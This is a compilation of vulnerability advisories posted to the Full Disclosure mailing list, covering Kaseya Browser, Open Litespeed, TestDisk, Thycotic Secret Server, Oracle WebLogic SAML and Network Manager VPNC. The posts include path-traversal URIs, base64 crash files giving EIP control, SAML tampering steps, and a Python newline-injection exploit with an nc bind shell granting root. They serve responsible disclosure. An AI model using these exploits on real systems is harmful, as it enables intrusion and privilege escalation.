13/10/2014 -Advisories sent to Kaseya
21/10/2014 -Additional information sent to Kaseya
22/11/2014 -Update from Kaseya
29/01/2015 -Advisory Release
+---+
| About Security-Assessment.com |
+---+
Security-Assessment.com is Australasia's leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients include
some of the largest globally recognised companies in areas such as finance,
telecommunications, broadcasting, legal and government. Our aim is to provide
the very best independent advice and a high level of technical expertise while
creating long and lasting professional relationships with our clients.
Security-Assessment.com is committed to security research and development,
and its team continues to identify and responsibly publish vulnerabilities
in public and private software vendor's products. Members of the
Security-Ass
[FD] Kaseya Browser Android Path Traversal
(, ) (,
. '.' ) ('.',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _/ / _ \ _
\ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ |\\ \__( <_> ) Y Y \
/__ /\___|__ / \___ >/|__|_| /
\/ \/.-.\/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Kaseya Browser Android Path Traversal
Affected Versions: Kaseya Browser 7.0 Android
PDF:
http://www.security-assessment.com/files/documents/advisory/Kaseya_Browser_Android_Path_Traversal.pdf
+-+
| Description |
+-+
This advisory details a vulnerability found within Kaseya Browser Android
application. A path traversal vulnerability was discovered within an exported
content provider, resulting in the disclosure of arbitrary files, including
internal application files.
+--+
| Exploitation |
+--+
The Kaseya Browser Android application exposes a content provider that is
vulnerable to path traversal. This allows any other application installed on
the device to read arbitrary files using the Kaseya Browser application’s
permissions. This can be done by reading from the com.roverapps.retriever
content provider as follows:
content://com.roverapps.retriever/../../../../../sdcard/
content://com.roverapps.retriever/../databases/suitestorage.db
+--+
| Solution |
+--+
No official solution is currently available for this issue.
+-+
| Disclosure Timeline |
+-+
03/10/2014 -Initial contact with Kaseya Support
09/10/2014 -Established Kaseya security contact
13/10/2014 -Advisories sent to Kaseya
21/10/2014 -Additional information sent to Kaseya
22/11/2014 -Update from Kaseya
29/01/2015 -Advisory Release
+---+
| About Security-Assessment.com |
+---+
Security-Assessment.com is Australasia's leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients include
some of the largest globally recognised companies in areas such as finance,
telecommunications, broadcasting, legal and government. Our aim is to provide
the very best independent advice and a high level of technical expertise while
creating long and lasting professional relationships with our clients.
Security-Assessment.com is committed to security research and development,
and its team continues to identify and responsibly publish vulnerabilities
in public and private software vendor's products. Members of the
Security-Assessment.com R&D team are globally recognised through their release
of whitepapers and presentations related to new security research.
For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info () security-assessment com
Phone +64 4 470 1650
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Open Litespeed Use After Free Vulnerability
(, ) (,
. '.' ) ('.',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _/ / _ \ _
\ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ |\\ \__( <_> ) Y Y \
/__ /\___|__ / \___ >/|__|_| /
\/ \/.-.\/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Open Litespeed Use After Free Vulnerability
Affected versions: Open Litespeed <= 1.3.9
PDF:
http://www.security-assessment.com/files/documents/advisory/Open%20Litespeed%20Use%20After%20Free%20Vulnerability.pdf
+---+
|Description|
+---+
A use after free vulnerability was discovered within the header parser
of the Open Litespeed web server. This vulnerability can be successfully
exploited to trigger an out of bounds memory read, resulting in a
segmentation fault crashing the web server
++
|Exploitation|
++
By sending a crafted request, an attacker may trigger an out-of-bounds
memory read, crashing the web server. This is due to a portion of memory
being referenced by the application after being freed by a realloc() call.
The second parameter (p) to the memmove() call (line 741, httpreq.cpp)
within the HttpReq:newKeyValueBuf method results in an out of bound
memory read when the attacker submits a crafted requests contain a large
number of header rows. This is is due to the portion of memory the 'p'
parameter resides in being freed by a realloc() call. The reallocation
is performed by the allocate() method of the AutoBuf class. This is
triggered by the call to AutoBuf's grow() method within the
newKeyValueBuf method (line 736, httpreq.cpp). The newKeyValueBuf method
snippet is detailed below, showing the call to AutoBuf::Grow() and the
subsequent memmove() call:
735 if ( m_reqBuf.available() < total )
736 if ( m_reqBuf.grow( total ) )
737 return NULL;
738 char * pNewBuf = m_reqBuf.end();
739 m_reqBuf.used( total );
740 if ( orgSize > 0 )
741 memmove( pNewBuf, p, sizeof( int ) * 2 + sizeof(
key_value_pair ) * orgSize );
742 else
743 *( ((int *)pNewBuf) + 1 ) = 0;
Further information is available in the advisory PDF. POC exploit code
can be found at
http://www.security-assessment.com/files/documents/advisory/openlitespeed-1.3.9-UAF-DOS.c
+--+
| Solution |
+--+
Update to the latest version of the Open Litespeed web server
+---+
|Disclosure Timeline|
+---+
26/03/2015 - Advisory send to Litespeed
27/03/2015 - Response from Litespeed stating the vulnerability will be
fixed in the next release of Open Litespeed
10/04/2015 - Open Litespeed 1.3.10 released
14/04/2015 - Advisory PDF released
+-+
|About Security-Assessment.com|
+-+
Security-Assessment.com is Australasia's leading team of Information
Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients include
some of the largest globally recognised companies in areas such as finance,
telecommunications, broadcasting, legal and government. Our aim is to
provide
the very best independent advice and a high level of technical expertise
while
creating long and lasting professional relationships with our clients.
Security-Assessment.com is committed to security research and development,
and its team continues to identify and responsibly publish vulnerabilities
in public and private software vendor's products. Members of the
Security-Assessment.com R&D team are globally recognised through their
release
of whitepapers and presentations related to new security research.
For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info () security-assessment com
Phone +64 4 470 1650
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] TestDisk 6.14 Check_OS2MB Stack Buffer Overflow
(, ) (,
. '.' ) ('.',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _/ / _ \ _
\ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ |\\ \__( <_> ) Y Y \
/__ /\___|__ / \___ >/|__|_| /
\/ \/.-.\/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
TestDisk 6.14 Check_OS2MB Stack Buffer Overflow
Affected versions: TestDisk 6.14 - Linux, Windows and Mac OSX
PDF:
http://www.security-assessment.com/files/documents/advisory/Testdisk%20Check_OS2MB%20Stack%20Buffer%20Overflow%20-%20Release.pdf
+---+
|Description|
+---+
This document details a stack based buffer overflow vulnerability within
TestDisk 6.14. A buffer overflow is triggered
within the software when a malicious disk image is attempted to be recovered.
This may be leveraged by an
attacker to crash TestDisk and gain control of program execution. An attacker
would have to coerce the victim to run
TestDisk against their malicious image.
++
|Exploitation|
++
The check_OS2MB method (fat.c, line 862) is vulnerable to a stack based buffer
overflow. This is due to the 512
byte buffer 'buffer' (defined in fat.c, check_OS2MB method, line 864) being
overflowed by a subsequent memcpy
call in the cache_pread_aux method (hdcache.c, line 109). The third argument to
the memcpy call (defining the
amount of data to be copied) is controlled by the attacker, this is set in a
header in the test case (offset 0xC in the
below testcase, set to 2048, or 0x0800).
The following GDB output shows the vulnerable memcpy call and the attacker
controlled size argument (0x0800):
Breakpoint 1, 0x0804e5c2 in cache_pread_aux (disk_car=0x80c13b0,
buffer=0xb0f0, count=2048, offset=0, read_ahead=0) at hdcache.c:109
109 memcpy(buffer, cache->buffer + offset - cache->cache_offset,
count);
(gdb) x/i $eip
=> 0x804e5c2 : call 0x80499f0
(gdb) x/3x $esp
0xb010: 0xb0f0 0x080c3000 0x0800
The following base64 data contains the test case which results in EIP control,
in this case EIP being set to
BEE5BEE5. The value EIP is overwritten with is at 0x20c
6zyQbWtkb3dmcwAACASOAAEAAIAQ+AEAAQABAOs8kG1rZAApj2Ji7SAgICAgICAgICAgRkFU
ICAgICAgIEZBVDEyICAgDh++W3ysIsB0C/Ay5M0ezRnr/lRoaXMgaXMgbm90IGEgYm9vdGFibGUg
ZGlzay4gIFBsZWFzZSBpbnNlcnQgYSBib290YWJsZSBmbG9wcHkgYW5kDQpwcmVzcyBhbnkga2V5
IHRvIHRyeSBhZ2FpbiAuLi5ADQoA
7v//f/8AAADW1tbW1tbW1tbW1tbW1tbW
1tbW1tbW1tbW1tbW1tYAAAD+4AgA
AAD/D//p5gBAAB4AAPQAAOT98v//
EAD/gAUE/wAA7fcAAACABQAA
IwCAAP/zAAQAAP8AAPj/ABcAAJaFhYWA/wAAVaoA
KY9iYu3lvuW+NAsGCA0K
--[ Linux
Note that in the provided test case, 4 bytes at 0x210 have been set to a valid
address within the TEXT segment of
the TestDisk ELF file. This is due to GCC 4.7.2 compiling the Check_OS2MB
method with the following assembly
code:
0x08060a8d <+71>:call *%ecx
0x08060a8f <+73>:mov%eax,%edx
0x08060a91 <+75>:mov0x8(%ebp),%eax
0x08060a94 <+78>:mov0x194(%eax),%eax
0x08060a9a <+84>:cmp%eax,%edx
0x08060a9c <+86>:je 0x8060ac5
The instruction 'mov 0x8(%ebp), %eax' (0x08060a91) moves an attacker controlled
portion of memory into the EAX
register and subsequently tries to read from that address ('mov 0x194(%eax)').
Thus, this has to be set to a
legitimate address, otherwise TestDisk performs an out-of-bounds memory read
before returning from the
check_OS2MB method.
As long as EDX and EAX do not match, the check_OS2MB method calls
screen_buffer_add and log_redirect, then
jumps to the end of the check_OS2MB method, successfully exploiting stack
overflow and gaining EIP control.
The precompiled version of TestDisk has been compiled with a stack protector.
In order to exploit the precompiled
version, an attacker would have to find a way to bypass GCC’s
'-fstack-protector' functionality
--[ Windows
The provided test case results in EIP being overwritten with 0xBEE5BEE5 in the
precompiled version of TestDisk.
This was tested on Windows 7 and 8.1.
--[ Mac OSX
An attacker can also gain EIP control on the Mac OSX version of TestDisk 6.14,
however the original test case
needs to be padded. The value EIP is overwritten with is at 0x21C in the OSX
test case. The base64 of the OSX crash
test case is below. As in the above examples, EIP is overwritten with
0xBEE5BEE5.
6zyQbWtkb3dmcwAACASOAAEAAIAQ+AEAAQABAOs8kG1rZAApj2Ji7SAgICAgICAgICAgRkFU
ICAgICAgIEZBVDEyICAgDh++W3ysIsB0C/Ay5M0ezRnr/lRoaXMgaXMgbm90IGEgYm9vdGFibGUg
ZGlzay4gIFBsZWFzZSBpbnNlcnQgYSBib290YWJsZSBmbG9wcHkgYW5kDQpwcmVzcyBhbnkga2V5
IHRvIHRyeSBhZ2FpbiAuLi5
[FD] SecretServerSecretStealer - An extraction utility for Thycotic Secret Server
(, ) (,
. '.' ) ('.',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _/ / _ \ _
\ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ |\\ \__( <_> ) Y Y \
/__ /\___|__ / \___ >/|__|_| /
\/ \/.-.\/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
SecretServerSecretStealer - A Powershell script that decrypts the data stored
within a Thycotic Secret Server
URL: https://github.com/denandz/SecretServerSecretStealer
+-+
| Description |
+-+
SecretServerSecretStealer is a powershell script that allows for the decryption
of passwords (and other items) stored within a Thycotic Secret Server
installation.
Two methods are exposed, Invoke-SecretDecrypt and Invoke-SecretStealer.
Invoke-SecretDecrypt requires you to manually pass the various data needed to
decrypt a single secret (see Decryption in README.md). Invoke-SecretStealer is
designed to be run on a Thycotic Secret Server machine itself, and takes only
the web root as a parameter. The SecretStealer will decrypt the database
configuration and connect to the applications db. All relevant information is
extracted, and all secrets decrypted.
The script is available at: https://github.com/denandz/SecretServerSecretStealer
+---+
| About Security-Assessment.com |
+---+
Security-Assessment.com is a leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients include
some of the largest globally recognised companies in areas such as finance,
telecommunications, broadcasting, legal and government. Our aim is to provide
the very best independent advice and a high level of technical expertise while
creating long and lasting professional relationships with our clients.
Security-Assessment.com is committed to security research and development,
and its team continues to identify and responsibly publish vulnerabilities
in public and private software vendor's products. Members of the
Security-Assessment.com R&D team are globally recognised through their release
of whitepapers and presentations related to new security research.
For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info () security-assessment com
Phone +64 4 470 1650
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Oracle WebLogic - Multiple SAML Vulnerabilities (CVE-2018-2998/CVE-2018-2933)
Oracle WebLogic - Multiple SAML Vulnerabilities (CVE-2018-2998/CVE-2018-2933) Release URL: https://pulsesecurity.co.nz/advisories/WebLogic-SAML-Vulnerabilities Date Released: 18/07/2018 CVE: CVE-2018-2998 CVE-2018-2933 Author: Denis Andzakovic Vendor Website: http://www.oracle.com Affected Software: Oracle Fusion Middleware 12c (12.2.1.3.0) WebLogic Server --[ Description Two vulnerabilities were discovered within the Oracle WebLogic SAML service provider authentication mechanism. By inserting an XML comment into the SAML NameID tag, an attacker can coerce the SAML service provider to log in as another user. Additionally, WebLogic does not require signed SAML assertions in the default configuration. By omitting the signature portions from a SAML assertion, an attacker can craft an arbitrary SAML assertion and bypass the authentication mechanism. --[ SAML Authentication Bypass By inserting an XML comment, an attacker can coerce the WebLogic SAML Service Provider to log in as another user. When an XML comment is added inside a NameID tag, the WebLogic server only processes the string after the comment. Adding the XML comment does not invalidate the SAML assertion’s signature. For example; an attacker who can register the user attackeradmin with the identity provider may log in, tamper the resulting valid SAML assertion without invalidating the signature and gain access as the admin user. The following figure details the tampered assertion (the full assertion has been omitted for brevity): attackeradmin The following figure shows the relevant debug log lines. Complete log lines have been omitted for brevity: <[ACTIVE] ExecuteThread: '2' for queue: 'weblogic.kernel.Default (self-tuning)'> <> <> <94584814-7693-4517-b1ce-d6cf53870dcb-0043> <1524397013394> <[severity-value: 128] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > attackeradmin_ommited_ <[ACTIVE] ExecuteThread: '2' for queue: 'weblogic.kernel.Default (self-tuning)'> <> <> <94584814-76934517-b1ce-d6cf53870dcb-0043> <1524397013408> <[severity-value: 128] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > <[ACTIVE] ExecuteThread: '2' for queue: 'weblogic.kernel.Default (self-tuning)'> <> <> <94584814-76934517-b1ce-d6cf53870dcb-0043> <1524397013408> <[severity-value: 128] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > --[ SAML Insecure Defaults - Missing Signature Verification In the default configuration, WebLogic does not require SAML assertions to be signed. If the signature section is omitted from a SAML response, then no signature verification is performed. This behavior can be used to bypass authentication and gain access as an arbitrary user. The SingleSignOnServicesMBean.WantAssertionsSigned MBean attribute is not present by default. In this default configuration, an attacker may remove the Signature tags from the SAML assertion, tamper the assertion (usually setting the ds:NameID to a target user) and log in as any user. The following XML shows an example SAML assertion for a user called ‘admin’ with the Signature tags removed. http://localhost:7001/saml2/sp/acs/post"; ID="id39453084082248801717742013" IssueInstant="2018-04-22T10:28:53.593Z" Version="2.0"> REDACTED REDACTED admin http://localhost:7001/saml2/sp/acs/post"; /> WLS_SP urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport --[ Timeline 26/04/2018 - Advisory sent to Oracle 26/04/2018 - Advisory acknowledged 27/04/2018 - Case numbers S1003812 and S1003820 assigned to track the SAML authentication bypass and insecure defaults, respectively 25/05/2018 - Automated email update received from Oracle 23/06/2018 - Email from Oracle requesting a the disclosure for the insecure defaults to be delayed until at least October 26/06/2018 - Automated email update received from Oracle 05/07/2018 - Response sent to Oracle, advised the original disclosure date will remain 14/07/2018 - Oracle advised both issues are fixed in the upcoming July 17th critical patch update 18/07/2018 - Advisory released --[ About Pulse Security Pulse Security is a specialist offensive security consultancy dedicated to providing best in breed security testing and review services. W: https://pulsesecurity.co.nz E: info at pulsesecurity.co.nz ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Network Manager VPNC - Privilege Escalation (CVE-2018-10900)
Network Manager VPNC - Privilege Escalation (CVE-2018-10900)
Release URL: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
Date Released: 21/07/2018
CVE: CVE-2018-10900
Author: Denis Andzakovic
Source: https://gitlab.gnome.org/GNOME/NetworkManager-vpnc
Affected Software: Network Manager VPNC – 1.2.4
--[ Description
The Network Manager VPNC plugin is vulnerable to a privilege escalation attack.
A new line character can be used to inject a Password helper parameter into the
configuration data passed to VPNC, allowing an attacker to execute arbitrary
commands as root.
--[ Privilege Escalation
When initiating a VPNC connection, Network Manager spawns a new vpnc process
and passes the configuration via STDIN. By injecting a \n character into a
configuration parameter, an attacker can coerce Network Manager to set the
Password helper option to an attacker controlled executable file.
The following python script generates a VPNC connection which will execute the
/tmp/test file when connected. The new line character is injected into the
Xauth username parameter.
import dbus
con = {
'vpn':{
'service-type':'org.freedesktop.NetworkManager.vpnc',
'data':{
'IKE DH Group':'dh2',
'IPSec ID':'testgroup',
'IPSec gateway':'gateway',
'IPSec secret-flags':'4',
'Local Port':'0',
'NAT Traversal Mode': 'natt',
'Perfect Forward Secrecy': 'server',
'Vendor': 'cisco',
'Xauth password-flags': '4',
'Xauth username': "username\nPassword helper /tmp/test",
'ipsec-secret-type': 'unused',
'xauth-password-type': 'unused'
}
},
'connection':{
'type':'vpn',
'id':'vpnc_test',
},
'ipv4':{'method':'auto'},
'ipv6':{'method':'auto'}
}
bus = dbus.SystemBus()
proxy = bus.get_object("org.freedesktop.NetworkManager",
"/org/freedesktop/NetworkManager/Settings")
settings = dbus.Interface(proxy, "org.freedesktop.NetworkManager.Settings")
settings.AddConnection(con)
The above results in the following configuration being passed to the vpnc
process when the connection is initialized:
Debug 0
Script /usr/local/libexec/nm-vpnc-service-vpnc-helper 0 3950 --bus-name
org.freedesktop.NetworkManager.vpnc.Connection_4
Cisco UDP Encapsulation Port 0
Local Port 0
IKE DH Group dh2
Perfect Forward Secrecy server
Xauth username username
Password helper /tmp/test
IPSec gateway gateway
IPSec ID testgroup
Vendor cisco
NAT Traversal Mode natt
The following figure details the complete privilege escalation attack.
doi@ubuntu:~$ cat << EOF > /tmp/test
> #!/bin/bash
> mkfifo pipe
> nc -k -l -p 8080 < pipe | /bin/bash > pipe
> EOF
doi@ubuntu:~$ python vpnc_privesc.py
doi@ubuntu:~$ nmcli connection
NAMEUUID TYPE DEVICE
Wired connection 1 a8b178fd-8cbc-3e15-aa9e-d52982215d98 ethernet ens3
vpnc_test 233101cb-f786-44ed-9e4f-662f1a519429 vpn ens3
doi@ubuntu:~$ nmcli connection up vpnc_test
^Z
[1]+ Stopped nmcli connection up vpnc_test
doi@ubuntu:~$ nc -vv 127.0.0.1 8080
Connection to 127.0.0.1 8080 port [tcp/http-alt] succeeded!
id
uid=0(root) gid=0(root) groups=0(root)
--[ Timeline
11/07/2018 - Advisory sent to secur...@gnome.org
13/07/2018 - Acknowledgement from Gnome security
20/07/2018 - CVE-2018-10900 assigned, patch scheduled for the following day
21/07/2018 - Network Manager VPNC 1.2.6 released
21/07/2018 - Advisory released
--[ About Pulse Security
Pulse Security is a specialist offensive security consultancy dedicated to
providing best in breed security testing and review services.
W: https://pulsesecurity.co.nz
E: info at pulsesecurity.co.nz
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
